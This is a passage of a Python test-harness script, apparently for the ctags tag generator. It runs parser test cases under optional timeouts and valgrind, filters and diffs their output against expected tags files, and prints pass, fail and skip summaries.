    # parameter - kept as-is; confirm whether that is intentional.
    actual = anonhash(input_actual)
    expected = anonhash(input_expected)
    if internal:
        result = [[actual, expected]]
    else:
        result = ['-e', 's/' + actual + '/' + expected + '/g']
    if args:
        return result + anon_normalize_sub(internal, ctags, *args)
    return result
def is_anon_normalize_needed(rawout):
    """True when *rawout* appears to contain an anonhash (8 hex digits)."""
    with open(rawout, 'r', errors='ignore') as f:
        return re.search(r'[0-9a-f]{8}', f.read()) is not None
# return a list of filters for normalizing anonhash
#
# If internal is True, return a list of pairs of [pattern, replacement],
# otherwise return a list of command line arguments.
def anon_normalize(internal, rawout, ctags, input_actual, *args):
    """Return anonhash-normalizing filters, or [] when *rawout* contains
    no hash-like text."""
    if not is_anon_normalize_needed(rawout):
        return []
    return anon_normalize_sub(internal, ctags, input_actual, *args)
def run_filter(finput, foutput, base_filter, anon_filters):
    """Rewrite *finput* into *foutput*, applying the basename filter once
    per line plus every anonhash filter."""
    base_re = re.compile(base_filter[0])
    base_repl = base_filter[1]
    anon = [(re.compile(pat), repl) for pat, repl in anon_filters]
    with open(finput, 'r', errors='surrogateescape') as fin, \
         open(foutput, 'w', errors='surrogateescape', newline='\n') as fout:
        for raw in fin:
            text = base_re.sub(base_repl, raw, 1)  # first match only
            for pat, repl in anon:
                text = pat.sub(repl, text)
            fout.write(text)
def guess_lang(cmdline, finput):
    """Ask ctags which language it would choose for *finput*."""
    proc = subprocess.run(cmdline + ['--print-language', finput],
                          stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    out = proc.stdout.decode('utf-8').replace("\r\n", "\n").replace("\n", '')
    # output is "<file>: <language>"; keep only the language part
    return re.sub(r'^.*: ', r'', out)
def guess_lang_from_log(log):
    """Extract the parser name from a ctags --verbose log, or '' if the
    log holds no OPENING line."""
    with open(log, 'r', encoding='utf-8', errors='ignore') as f:
        for entry in f:
            matched = re.match('OPENING.* as (.*) language .*file ', entry)
            if matched:
                return matched.group(1)
    return ''
def run_tcase(finput, t, name, tclass, category, build_t, extra_inputs):
    """Run one Units test case and record its outcome.

    finput: primary input file of the case.
    t: the test-case directory (holds args.ctags, expected.tags*, ...).
    name, tclass: case name and class letter (d/b/t/i/v) from the dir name.
    category: category the case belongs to.
    build_t: directory where temporary outputs are written.
    extra_inputs: additional input files for multi-input cases.

    Returns True when the case passed (or failed in a KNOWN-bug way),
    False when it failed or was skipped.  Outcomes are also appended to
    the global L_* result lists (shared with worker threads).
    """
    global L_PASSED
    global L_FIXED
    global L_FAILED_BY_STATUS
    global L_FAILED_BY_DIFF
    global L_SKIPPED_BY_FEATURES
    global L_SKIPPED_BY_LANGUAGES
    global L_SKIPPED_BY_ILOOP
    global L_KNOWN_BUGS
    global L_FAILED_BY_TIMEED_OUT
    global L_BROKEN_ARGS_CTAGS
    global L_VALGRIND
    o = build_t
    # per-case control files
    fargs = t + '/args.ctags'
    ffeatures = t + '/features'
    flanguages = t + '/languages'
    ffilter = t + '/filter'
    fexpected = t + '/expected.tags'
    # pick output format from whichever expected.tags* variant exists
    output_type = 'ctags'
    output_label = ''
    output_tflag = []
    output_feature = ''
    output_lang_extras = ''
    if os.path.isfile(fexpected):
        pass
    elif os.path.isfile(t + '/expected.tags-e'):
        fexpected = t + '/expected.tags-e'
        output_type = 'etags'
        output_label = '/' + output_type
        output_tflag = ['-e', '--tag-relative=no']
    elif os.path.isfile(t + '/expected.tags-x'):
        fexpected = t + '/expected.tags-x'
        output_type = 'xref'
        output_label = '/' + output_type
        output_tflag = ['-x']
    elif os.path.isfile(t + '/expected.tags-json'):
        fexpected = t + '/expected.tags-json'
        output_type = 'json'
        output_label = '/' + output_type
        output_tflag = ['--output-format=json']
        output_feature = 'json'
    if len(extra_inputs) > 0:
        output_lang_extras = ' (multi inputs)'
    # fall back to 'cat' when the case has no executable filter script
    if not shutil.which(ffilter):
        ffilter = 'cat'
    # temporary output files produced for this case
    ostderr = o + '/' + _STDERR_OUTPUT_NAME
    orawout = o + '/RAWOUT.tmp'
    ofiltered = o + '/FILTERED.tmp'
    odiff = o + '/' + _DIFF_OUTPUT_NAME
    ocmdline = o + '/CMDLINE.tmp'
    ovalgrind = o + '/' + _VALGRIND_OUTPUT_NAME
    oresult = o + '/RESULT.tmp'
    oshrink_template = o + '/SHRINK-%s.tmp'
    obundles = o + '/BUNDLES'
    broken_args_ctags = False
    #
    # Filtered by UNIT
    #
    if not check_units(name, category):
        return False
    #
    # Build cmdline
    #
    cmdline = [CTAGS, '--verbose', '--options=NONE', '--fields=-T']
    if PRETENSE_OPTS != '':
        cmdline += [PRETENSE_OPTS]
    cmdline += ['--optlib-dir=+' + t + '/optlib', '-o', '-']
    if os.path.isfile(fargs):
        cmdline += ['--options=' + fargs]
        # sanity-check args.ctags without parsing any input
        ret = subprocess.run(cmdline + ['--_force-quit=0'],
                             stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if ret.returncode != 0:
            broken_args_ctags = True
    #
    # make a backup (basedcmdline) of cmdline. basedcmdline is used
    # as a command line template for running shrinker. basedcmdline
    # should not include the name of the input file name. The
    # shrinker makes a another cmdline by applying a real input file
    # name to the template. On the other hand, cmdline is
    # destructively updated by appending input file name in this
    # function. The file name should not be included in the cmdline
    # template.
    #
    # To avoid the updating in this function propagating to
    # basecmdline, we copy the cmdline here.
    #
    basecmdline = cmdline[:]
    #
    # Filtered by LANGUAGES
    #
    guessed_lang = None
    if len(LANGUAGES) > 0:
        guessed_lang = guess_lang(basecmdline, finput)
        if not guessed_lang in LANGUAGES:
            return False
    clean_tcase(o, obundles)
    os.makedirs(o, exist_ok=True)
    if not os.path.samefile(o, t):
        prepare_bundles(t, o, obundles)

    # helper function for building some strings based on guessed_lang:
    # returns (progress message, shrinker cmdline template, shrink file)
    def build_strings(guessed_lang):
        return ('%-59s ' % ('Testing ' + name + ' as ' + guessed_lang + output_lang_extras + output_label),
                join_cmdline(basecmdline) + ' --language-force=' + guessed_lang + ' %s > /dev/null 2>&1',
                oshrink_template % (guessed_lang.replace('/', '-')))

    # skip when a required (or unwanted) ctags feature doesn't match
    (tmp, feat) = check_features(output_feature, ffeatures)
    if not tmp:
        if not guessed_lang:
            guessed_lang = guess_lang(basecmdline, finput)
        msg = build_strings(guessed_lang)[0]
        L_SKIPPED_BY_FEATURES += [category + '/' + name]
        if feat.startswith('!'):
            run_result('skip', msg, oresult, 'unwanted feature "' + feat[1:] + '" is available')
        else:
            run_result('skip', msg, oresult, 'required feature "' + feat + '" is not available')
        return False
    # skip when a required language parser is unavailable
    (tmp, lang) = check_languages(basecmdline, flanguages)
    if not tmp:
        if not guessed_lang:
            guessed_lang = guess_lang(basecmdline, finput)
        msg = build_strings(guessed_lang)[0]
        L_SKIPPED_BY_LANGUAGES += [category + '/' + name]
        run_result('skip', msg, oresult, 'required language parser "' + lang + '" is not available')
        return False
    # 'i'-class cases loop forever; only run them under a timeout
    if WITH_TIMEOUT == 0 and tclass == 'i':
        if not guessed_lang:
            guessed_lang = guess_lang(basecmdline, finput)
        msg = build_strings(guessed_lang)[0]
        L_SKIPPED_BY_ILOOP += [category + '/' + name]
        run_result('skip', msg, oresult, 'may cause an infinite loop')
        return False
    if broken_args_ctags:
        if not guessed_lang:
            guessed_lang = guess_lang(basecmdline, finput)
        msg = build_strings(guessed_lang)[0]
        L_BROKEN_ARGS_CTAGS += [category + '/' + name]
        run_result('error', msg, None, 'broken args.ctags?')
        return False
    cmdline += output_tflag + [finput]
    if len(extra_inputs) > 0:
        cmdline += extra_inputs
    timeout_value = WITH_TIMEOUT
    if WITH_VALGRIND:
        # wrap the run in valgrind; errors surface via _VALGRIND_EXIT
        cmdline = ['valgrind', '--leak-check=full', '--track-origins=yes',
                   '--error-exitcode=' + str(_VALGRIND_EXIT), '--log-file=' + ovalgrind] + cmdline
        timeout_value *= _VG_TIMEOUT_FACTOR
    if timeout_value == 0:
        timeout_value = None
    start = time.time()
    try:
        with open(orawout, 'wb') as fo, \
             open(ostderr, 'wb') as fe:
            ret = subprocess.run(cmdline, stdout=fo, stderr=fe,
                                 timeout=timeout_value)
        run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
    except subprocess.TimeoutExpired:
        if not guessed_lang:
            guessed_lang = guess_lang(basecmdline, finput)
        (msg, cmdline_template, oshrink) = build_strings(guessed_lang)
        L_FAILED_BY_TIMEED_OUT += [category + '/' + name]
        run_result('error', msg, oresult, 'TIMED OUT')
        run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
        if RUN_SHRINK and len(extra_inputs) == 0:
            run_shrink(cmdline_template, finput, oshrink, guessed_lang)
        return False
    #print('execute time: %f' % (time.time() - start))
    # the --verbose log names the parser ctags actually chose
    guessed_lang = guess_lang_from_log(ostderr)
    (msg, cmdline_template, oshrink) = build_strings(guessed_lang)
    if ret.returncode != 0:
        if WITH_VALGRIND and ret.returncode == _VALGRIND_EXIT and \
           tclass != 'v':
            L_VALGRIND += [category + '/' + name]
            run_result('error', msg, oresult, 'valgrind-error')
            run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
            return False
        elif tclass == 'b':
            # 'b'-class cases are expected to fail (known bugs)
            L_KNOWN_BUGS += [category + '/' + name]
            run_result('known_error', msg, oresult)
            run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
            if RUN_SHRINK and len(extra_inputs) == 0:
                run_shrink(cmdline_template, finput, oshrink, guessed_lang)
            return True
        else:
            L_FAILED_BY_STATUS += [category + '/' + name]
            run_result('error', msg, oresult, 'unexpected exit status: ' + str(ret.returncode))
            run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
            if RUN_SHRINK and len(extra_inputs) == 0:
                run_shrink(cmdline_template, finput, oshrink, guessed_lang)
            return False
    elif WITH_VALGRIND and tclass == 'v':
        # a 'v'-class case that no longer trips valgrind is fixed
        L_FIXED += [category + '/' + name]
    if not os.path.isfile(fexpected):
        # no expectation file: a clean run is all that is required
        clean_tcase(o, obundles)
        if tclass == 'b':
            L_FIXED += [category + '/' + name]
        elif tclass == 'i':
            L_FIXED += [category + '/' + name]
        L_PASSED += [category + '/' + name]
        run_result('ok', msg, None, '"expected.tags*" not found')
        return True
    start = time.time()
    if ffilter != 'cat':
        # Use external filter
        filter_cmd = basename_filter(False, output_type) + \
            anon_normalize(False, orawout, CTAGS, finput, *extra_inputs) + \
            ['<', orawout]
        filter_cmd += ['|', ffilter]
        filter_cmd += ['>', ofiltered]
        #print(filter_cmd)
        subprocess.run([SHELL, '-c', join_cmdline(filter_cmd)])
    else:
        # Use internal filter
        run_filter(orawout, ofiltered, basename_filter(True, output_type),
                   anon_normalize(True, orawout, CTAGS, finput, *extra_inputs))
    #print('filter time: %f' % (time.time() - start))
    start = time.time()
    # cheap byte comparison first; run diff only on mismatch
    if filecmp.cmp(fexpected, ofiltered):
        ret.returncode = 0
    else:
        with open(odiff, 'wb') as f:
            ret = subprocess.run(['diff', '-U', str(DIFF_U_NUM),
                                  '-I', '^!_TAG', '--strip-trailing-cr', fexpected, ofiltered],
                                 stdout=f)
    #print('diff time: %f' % (time.time() - start))
    if ret.returncode == 0:
        clean_tcase(o, obundles)
        if tclass == 'b':
            L_FIXED += [category + '/' + name]
        elif WITH_TIMEOUT != 0 and tclass == 'i':
            L_FIXED += [category + '/' + name]
        L_PASSED += [category + '/' + name]
        run_result('ok', msg, None)
        return True
    else:
        if tclass == 'b':
            L_KNOWN_BUGS += [category + '/' + name]
            run_result('known_error', msg, oresult)
            run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
            return True
        else:
            L_FAILED_BY_DIFF += [category + '/' + name]
            run_result('error', msg, oresult, 'unexpected output')
            run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
            return False
def create_thread_queue(func):
    """Spawn NUM_WORKER_THREADS daemon workers draining a shared queue;
    each queued item is an argument tuple for *func*.  Returns (queue,
    thread list)."""
    q = queue.Queue()
    pool = []
    for _ in range(NUM_WORKER_THREADS):
        th = threading.Thread(target=worker, args=(func, q), daemon=True)
        th.start()
        pool.append(th)
    return (q, pool)
def worker(func, q):
    """Worker loop: apply *func* to queued argument tuples until a None
    poison pill arrives."""
    for item in iter(q.get, None):
        try:
            func(*item)
        except:
            import traceback
            traceback.print_exc()
        q.task_done()
def join_workers(q, threads):
    """Wait for the work queue to drain, then stop and join all workers.

    On KeyboardInterrupt the queue is emptied, workers are sent their
    None poison pills, given a 2-second grace period each, and the whole
    process exits with status 1.
    """
    # block until all tasks are done
    try:
        q.join()
    except KeyboardInterrupt:
        # empty the queue
        while True:
            try:
                q.get_nowait()
            except queue.Empty:
                break
        # try to stop workers (one None pill per worker thread)
        for i in range(NUM_WORKER_THREADS):
            q.put(None)
        for t in threads:
            t.join(timeout=2)
        # exit regardless that workers are stopped
        sys.exit(1)
    # stop workers
    for i in range(NUM_WORKER_THREADS):
        q.put(None)
    for t in threads:
        t.join()
def accepted_file(fname):
    """Reject editor backup files (names ending in '~')."""
    return not fname.endswith('~')
def run_dir(category, base_dir, build_base_dir):
    """Queue every test case found under *base_dir* onto a worker pool
    (honoring the CATEGORIES filter) and wait for completion."""
    #
    # Filtered by CATEGORIES
    #
    if CATEGORIES and category not in CATEGORIES:
        return False
    print("\nCategory: " + category)
    line()
    (q, threads) = create_thread_queue(run_tcase)
    for finput in glob.glob(base_dir + '/*.[dbtiv]/input.*'):
        finput = finput.replace('\\', '/')  # for Windows
        if not accepted_file(finput):
            continue
        dname = os.path.dirname(finput)
        extra_inputs = sorted(
            x.replace('\\', '/')  # for Windows
            for x in (glob.glob(dname + '/input[-_][0-9].*') +
                      glob.glob(dname + '/input[-_][0-9][-_]*.*'))
            if accepted_file(x))
        tcase_dir = dname
        build_tcase_dir = build_base_dir + remove_prefix(tcase_dir, base_dir)
        parsed = re.match(r'^.*/(.*)\.([dbtiv])$', tcase_dir)
        (name, tclass) = parsed.group(1, 2)
        q.put((finput, tcase_dir, name, tclass, category,
               build_tcase_dir, extra_inputs))
    join_workers(q, threads)
def run_show_diff_output(units_dir, t):
    """Print (tab-indented) the saved diff output for test case *t*."""
    print("\t", end='')
    line('.')
    for fn in glob.glob(units_dir + '/' + t + '.*/' + _DIFF_OUTPUT_NAME):
        with open(fn, 'r') as f:
            for entry in f:
                print("\t" + entry, end='')
    print()
def run_show_stderr_output(units_dir, t):
    """Print (tab-indented) the last 50 lines of saved stderr for *t*."""
    print("\t", end='')
    line('.')
    for fn in glob.glob(units_dir + '/' + t + '.*/' + _STDERR_OUTPUT_NAME):
        with open(fn, 'r') as f:
            tail = f.readlines()[-50:]
        for entry in tail:
            print("\t" + entry, end='')
    print()
def run_show_valgrind_output(units_dir, t):
    """Print (tab-indented) the saved valgrind log for test case *t*."""
    print("\t", end='')
    line('.')
    for fn in glob.glob(units_dir + '/' + t + '.*/' + _VALGRIND_OUTPUT_NAME):
        with open(fn, 'r') as f:
            for entry in f:
                print("\t" + entry, end='')
    print()
def run_summary(build_dir):
    """Print the final per-outcome summary of the whole run.

    Each section shows a count and the affected 'category/name' entries;
    with SHOW_DIFF_OUTPUT the failure sections also dump saved stderr,
    diff and valgrind details from *build_dir*.
    """
    fmt = ' %-40s%d'

    def strip_cat(entry):
        return remove_prefix(entry, _DEFAULT_CATEGORY + '/')

    def section(label, entries, per_entry=None):
        # one counted header plus an indented line (and optional detail
        # dump) per entry
        print(fmt % (label, len(entries)))
        for entry in entries:
            short = strip_cat(entry)
            print("\t" + short)
            if per_entry:
                per_entry(short)

    def _diff_details(short):
        run_show_stderr_output(build_dir, short)
        run_show_diff_output(build_dir, short)

    print()
    print('Summary (see CMDLINE.tmp to reproduce without test harness)')
    line()
    print(fmt % ('#passed:', len(L_PASSED)))
    section('#FIXED:', L_FIXED)
    section('#FAILED (broken args.ctags?):', L_BROKEN_ARGS_CTAGS)
    section('#FAILED (unexpected-exit-status):', L_FAILED_BY_STATUS,
            (lambda short: run_show_stderr_output(build_dir, short))
            if SHOW_DIFF_OUTPUT else None)
    section('#FAILED (unexpected-output):', L_FAILED_BY_DIFF,
            _diff_details if SHOW_DIFF_OUTPUT else None)
    if WITH_TIMEOUT != 0:
        section('#TIMED-OUT (' + str(WITH_TIMEOUT) + 's):', L_FAILED_BY_TIMEED_OUT)
    section('#skipped (features):', L_SKIPPED_BY_FEATURES)
    section('#skipped (languages):', L_SKIPPED_BY_LANGUAGES)
    if WITH_TIMEOUT == 0:
        section('#skipped (infinite-loop):', L_SKIPPED_BY_ILOOP)
    section('#known-bugs:', L_KNOWN_BUGS)
    if WITH_VALGRIND:
        section('#valgrind-error:', L_VALGRIND)
        if SHOW_DIFF_OUTPUT:
            section('##valgrind-error:', L_VALGRIND,
                    lambda short: run_show_valgrind_output(build_dir, short))
def make_pretense_map(arg):
    """Translate 'NEW/OLD[,NEW/OLD...]' into ' --_pretend-NEW=OLD ...'
    ctags options; aborts the harness on malformed input."""
    opts = ''
    for pair in arg.split(','):
        matched = re.match(r'(.*)/(.*)', pair)
        if not matched:
            error_exit(1, 'wrong format of --_pretend option arg')
        (newlang, oldlang) = matched.group(1, 2)
        if newlang == '':
            error_exit(1, 'newlang part of --_pretend option arg is empty')
        if oldlang == '':
            error_exit(1, 'oldlang part of --_pretend option arg is empty')
        opts += ' --_pretend-' + newlang + '=' + oldlang
    return opts
def action_run(parser, action, *args):
    """Handler for the 'run' (alias 'units') sub-command.

    Parses the sub-command options into the module-level configuration
    globals, runs every Units test case below units_dir (the default ROOT
    category plus each *.r category sub-directory), prints a summary, and
    returns a process exit status: 0 when everything passed, 1 when any
    case failed by status, diff, timeout, broken args, or valgrind.
    """
    global CATEGORIES
    global CTAGS
    global UNITS
    global LANGUAGES
    global WITH_TIMEOUT
    global WITH_VALGRIND
    global COLORIZED_OUTPUT
    global RUN_SHRINK
    global SHOW_DIFF_OUTPUT
    global PRETENSE_OPTS
    global NUM_WORKER_THREADS
    global SHELL
    parser.add_argument('--categories', metavar='CATEGORY1[,CATEGORY2,...]',
                        help='run only CATEGORY* related cases.')
    parser.add_argument('--ctags',
                        help='ctags executable file for testing')
    parser.add_argument('--units', metavar='UNITS1[,UNITS2,...]',
                        help='run only UNIT(S).')
    parser.add_argument('--languages', metavar='PARSER1[,PARSER2,...]',
                        help='run only PARSER* related cases.')
    parser.add_argument('--with-timeout', type=int, default=0,
                        metavar='DURATION',
                        help='run a test case with specified timeout in seconds. 0 means no timeout (default).')
    parser.add_argument('--with-valgrind', action='store_true', default=False,
                        help='run a test case under valgrind')
    parser.add_argument('--colorized-output', choices=['yes', 'no'], default='yes',
                        help='print the result in color.')
    parser.add_argument('--run-shrink', action='store_true', default=False,
                        help='(TODO: NOT IMPLEMENTED YET)')
    parser.add_argument('--show-diff-output', action='store_true', default=False,
                        help='show diff output (and valgrind errors) for failed test cases in the summary.')
    parser.add_argument('--with-pretense-map',
                        metavar='NEWLANG0/OLDLANG0[,...]',
                        help='make NEWLANG parser pretend OLDLANG.')
    parser.add_argument('--threads', type=int, default=NUM_WORKER_THREADS,
                        help='number of worker threads')
    parser.add_argument('--shell',
                        help='shell to be used.')
    parser.add_argument('units_dir',
                        help='Units directory.')
    parser.add_argument('build_dir', nargs='?', default='',
                        help='Build directory. If not given, units_dir is used.')
    res = parser.parse_args(args)
    if res.categories:
        # Category directories carry a '.r' suffix on disk; accept bare names
        # (except the special 'ROOT' category) and normalize them here.
        CATEGORIES = [x if x == 'ROOT' or x.endswith('.r') else x + '.r'
                      for x in res.categories.split(',')]
    if res.ctags:
        CTAGS = res.ctags
    if res.units:
        UNITS = res.units.split(',')
    if res.languages:
        LANGUAGES = res.languages.split(',')
    WITH_TIMEOUT = res.with_timeout
    WITH_VALGRIND = res.with_valgrind
    COLORIZED_OUTPUT = (res.colorized_output == 'yes')
    RUN_SHRINK = res.run_shrink
    SHOW_DIFF_OUTPUT = res.show_diff_output
    if res.with_pretense_map:
        PRETENSE_OPTS = make_pretense_map(res.with_pretense_map)
    NUM_WORKER_THREADS = res.threads
    if res.shell:
        SHELL = res.shell
    if res.build_dir == '':
        # In-tree build: generated files live next to the test sources.
        res.build_dir = res.units_dir
    if WITH_VALGRIND:
        check_availability('valgrind')
    check_availability('diff')
    init_features()
    if isabs(res.build_dir):
        build_dir = res.build_dir
    else:
        build_dir = os.path.realpath(res.build_dir)
    category = _DEFAULT_CATEGORY
    if len(CATEGORIES) == 0 or (category in CATEGORIES):
        run_dir(category, res.units_dir, build_dir)
    # Each *.r sub-directory is its own test category.
    for d in glob.glob(res.units_dir + '/*.r'):
        d = d.replace('\\', '/')  # for Windows
        if not os.path.isdir(d):
            continue
        category = os.path.basename(d)
        build_d = res.build_dir + '/' + category
        run_dir(category, d, build_d)
    run_summary(build_dir)
    if L_FAILED_BY_STATUS or L_FAILED_BY_DIFF or \
       L_FAILED_BY_TIMEED_OUT or L_BROKEN_ARGS_CTAGS or \
       L_VALGRIND:
        return 1
    else:
        return 0
def action_clean(parser, action, *args):
    """Handler for the 'clean' sub-command.

    Removes all files generated during units testing (BUNDLES contents plus
    *.tmp / *.TMP leftovers) below the given build directory. Returns 0.
    """
    parser.add_argument('units_dir',
                        help='Build directory for units testing.')
    parsed = parser.parse_args(args)
    units_dir = parsed.units_dir
    if not os.path.isdir(units_dir):
        error_exit(0, 'No such directory: ' + units_dir)
    for bundles in glob.glob(units_dir + '/**/BUNDLES', recursive=True):
        clean_bundles(bundles)
    for pattern in ('/**/*.tmp', '/**/*.TMP'):
        for leftover in glob.glob(units_dir + pattern, recursive=True):
            os.remove(leftover)
    return 0
def tmain_compare_result(build_topdir):
    """Print, tab-indented, every *-diff.txt and gdb-backtrace.txt found in
    the per-test build directories under BUILD_TOPDIR."""
    for diff_path in glob.glob(build_topdir + '/*/*-diff.txt'):
        print(diff_path)
        print()
        with open(diff_path, 'r', errors='replace') as f:
            for text_line in f:
                print("\t" + text_line, end='')
        print()
    for bt_path in glob.glob(build_topdir + '/*/gdb-backtrace.txt'):
        with open(bt_path, 'r', errors='replace') as f:
            for text_line in f:
                print("\t" + text_line, end='')
def tmain_compare(subdir, build_subdir, aspect, file):
    """Compare ASPECT-actual.txt against ASPECT-expected.txt for one test.

    On success report 'ok', remove any stale -diff.txt from a previous
    failure, and return True. On failure write a unified diff to
    ASPECT-diff.txt, report 'error', and return False.
    """
    msg = '%-59s ' % (aspect)
    diff_file = build_subdir + '/' + aspect + '-diff.txt'
    actual = build_subdir + '/' + aspect + '-actual.txt'
    expected = subdir + '/' + aspect + '-expected.txt'
    files_match = (os.path.isfile(actual)
                   and os.path.isfile(expected)
                   and filecmp.cmp(actual, expected))
    if not files_match:
        with open(diff_file, 'wb') as f:
            subprocess.run(['diff', '-U',
                            str(DIFF_U_NUM), '--strip-trailing-cr',
                            expected, actual],
                           stdout=f, stderr=subprocess.STDOUT)
        run_result('error', msg, None, 'diff: ' + diff_file, file=file)
        return False
    run_result('ok', msg, None, file=file)
    # When successful, remove the -diff.txt generated by the last failure to
    # keep the directory clean. Unlike other generated files (for example
    # gdb-backtrace.txt) the misc/review script reads the -diff.txt file, so
    # it gets this special handling.
    if os.path.isfile(diff_file):
        os.remove(diff_file)
    return True
def failed_git_marker(fn):
    """Return '<G>' when git is available and reports FN as untracked
    (ls-files succeeds but lists nothing); return '' otherwise."""
    if not shutil.which('git'):
        return ''
    proc = subprocess.run(['git', 'ls-files', '--', fn],
                          stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    if proc.returncode == 0 and proc.stdout == b'':
        return '<G>'
    return ''
def is_crashed(fn):
    """Return True if the captured stderr file FN records a core dump.

    FN is a stderr capture from a ctags run; a crashed run can emit arbitrary
    bytes, so decode errors are replaced rather than raised — consistent with
    how tmain_compare_result reads these same generated files.
    """
    with open(fn, 'r', errors='replace') as f:
        return 'core dump' in f.read()
def print_backtraces(ctags_exe, cores, fn):
    """Write a gdb backtrace for each core file in CORES into FN (binary)."""
    with open(fn, 'wb') as f:
        for core in cores:
            gdb_cmd = ['gdb', ctags_exe, '-c', core, '-ex', 'where', '-batch']
            subprocess.run(gdb_cmd, stdout=f, stderr=subprocess.DEVNULL)
def tmain_sub(test_name, basedir, subdir, build_subdir):
    """Run a single Tmain test case (SUBDIR/run.sh) and check its output.

    Executes run.sh via SHELL, captures stdout/stderr/exit status (and a
    generated tags file, if any) into *-actual.txt files under BUILD_SUBDIR,
    then compares each aspect against the matching *-expected.txt when one
    exists. All progress output is buffered in a StringIO so that output from
    concurrent worker threads is not interleaved. Always returns True;
    failures are recorded in the TMAIN_FAILED / TMAIN_STATUS globals.
    """
    global TMAIN_STATUS
    global TMAIN_FAILED
    # run.sh exits with this code to signal "skip this test".
    CODE_FOR_IGNORING_THIS_TMAIN_TEST = 77
    os.makedirs(build_subdir, exist_ok=True)
    # Clear stale results from a previous run.
    for fn in glob.glob(build_subdir + '/*-actual.txt'):
        os.remove(fn)
    strbuf = io.StringIO()
    print("\nTesting " + test_name, file=strbuf)
    line('-', file=strbuf)
    # run.sh executes with SUBDIR as its cwd, so relative tool paths must be
    # resolved against the original working directory (basedir) up front.
    if isabs(CTAGS):
        ctags_path = CTAGS
    else:
        ctags_path = os.path.join(basedir, CTAGS)
    if isabs(READTAGS):
        readtags_path = READTAGS
    else:
        readtags_path = os.path.join(basedir, READTAGS)
    if isabs(OPTSCRIPT):
        optscript_path = OPTSCRIPT
    else:
        optscript_path = os.path.join(basedir, OPTSCRIPT)
    start = time.time()
    ret = subprocess.run([SHELL, 'run.sh',
                          ctags_path,
                          build_subdir,
                          readtags_path,
                          optscript_path],
                         cwd=subdir,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    #print('execute time: %f' % (time.time() - start), file=strbuf)
    # Tolerate non-UTF-8 stdout by falling back to iso-8859-1, which can
    # decode any byte sequence.
    encoding = 'utf-8'
    try:
        stdout = ret.stdout.decode(encoding).replace("\r\n", "\n")
    except UnicodeError:
        encoding = 'iso-8859-1'
        stdout = ret.stdout.decode(encoding).replace("\r\n", "\n")
    stderr = ret.stderr.decode('utf-8').replace("\r\n", "\n")
    if os.path.basename(CTAGS) != 'ctags':
        # program name needs to be canonicalized
        stderr = re.sub('(?m)^' + os.path.basename(CTAGS) + ':', 'ctags:', stderr)
    if ret.returncode == CODE_FOR_IGNORING_THIS_TMAIN_TEST:
        run_result('skip', '', None, stdout.replace("\n", ''), file=strbuf)
        print(strbuf.getvalue(), end='')
        sys.stdout.flush()
        strbuf.close()
        return True
    with open(build_subdir + '/exit-actual.txt', 'w', newline='\n') as f:
        print(ret.returncode, file=f)
    with open(build_subdir + '/stdout-actual.txt', 'w', newline='\n', encoding=encoding) as f:
        print(stdout, end='', file=f)
    with open(build_subdir + '/stderr-actual.txt', 'w', newline='\n') as f:
        print(stderr, end='', file=f)
    if os.path.isfile(build_subdir + '/tags'):
        os.rename(build_subdir + '/tags', build_subdir + '/tags-actual.txt')
    for aspect in ['stdout', 'stderr', 'exit', 'tags']:
        expected_txt = subdir + '/' + aspect + '-expected.txt'
        actual_txt = build_subdir + '/' + aspect + '-actual.txt'
        if os.path.isfile(expected_txt):
            if tmain_compare(subdir, build_subdir, aspect, strbuf):
                os.remove(actual_txt)
            else:
                TMAIN_FAILED += [test_name + '/' + aspect + '-compare' +
                                 failed_git_marker(expected_txt)]
                TMAIN_STATUS = False
                # If ctags dumped core, capture a gdb backtrace for the summary.
                if aspect == 'stderr' and \
                   is_crashed(actual_txt) and \
                   shutil.which('gdb'):
                    print_backtraces(ctags_path,
                                     glob.glob(build_subdir + '/core*'),
                                     build_subdir + '/gdb-backtrace.txt')
        elif os.path.isfile(actual_txt):
            # No expectation for this aspect: discard the capture.
            os.remove(actual_txt)
    print(strbuf.getvalue(), end='')
    sys.stdout.flush()
    strbuf.close()
    return True
def tmain_run(topdir, build_topdir, units):
    """Run every Tmain test case (*.d directories) under TOPDIR on a worker
    thread pool, then print the failure summary. Returns TMAIN_STATUS
    (True when all selected cases passed)."""
    global TMAIN_STATUS
    TMAIN_STATUS = True
    (q, threads) = create_thread_queue(tmain_sub)
    basedir = os.getcwd()
    for subdir in glob.glob(topdir + '/*.d'):
        # Strip the trailing '.d' to get the test's name.
        test_name = os.path.basename(subdir)[:-2]
        if units and test_name not in units:
            continue
        build_subdir = build_topdir + '/' + os.path.basename(subdir)
        q.put((test_name, basedir, subdir, build_subdir))
    join_workers(q, threads)
    print()
    if not TMAIN_STATUS:
        print('Failed tests')
        line('=')
        for failure in TMAIN_FAILED:
            print(re.sub('<G>', ' (not committed/cached yet)', failure))
        print()
        if SHOW_DIFF_OUTPUT:
            print('Detail [compare]')
            line('-')
            tmain_compare_result(build_topdir)
    return TMAIN_STATUS
def action_tmain(parser, action, *args):
    """Handler for the 'tmain' sub-command.

    Parses the sub-command options into the module-level configuration
    globals, then runs the Tmain test cases under tmain_dir via tmain_run.
    Returns 0 when all cases pass, 1 otherwise.
    """
    global CTAGS
    global COLORIZED_OUTPUT
    global WITH_VALGRIND
    global SHOW_DIFF_OUTPUT
    global READTAGS
    global OPTSCRIPT
    global UNITS
    global NUM_WORKER_THREADS
    global SHELL
    parser.add_argument('--ctags',
                        help='ctags executable file for testing')
    parser.add_argument('--colorized-output', choices=['yes', 'no'], default='yes',
                        help='print the result in color.')
    parser.add_argument('--with-valgrind', action='store_true', default=False,
                        help='(not implemented) run a test case under valgrind')
    parser.add_argument('--show-diff-output', action='store_true', default=False,
                        help='how diff output for failed test cases in the summary.')
    parser.add_argument('--readtags',
                        help='readtags executable file for testing')
    parser.add_argument('--optscript',
                        help='optscript executable file for testing')
    parser.add_argument('--units', metavar='UNITS1[,UNITS2,...]',
                        help='run only Tmain/UNIT*.d (.d is not needed)')
    parser.add_argument('--threads', type=int, default=NUM_WORKER_THREADS,
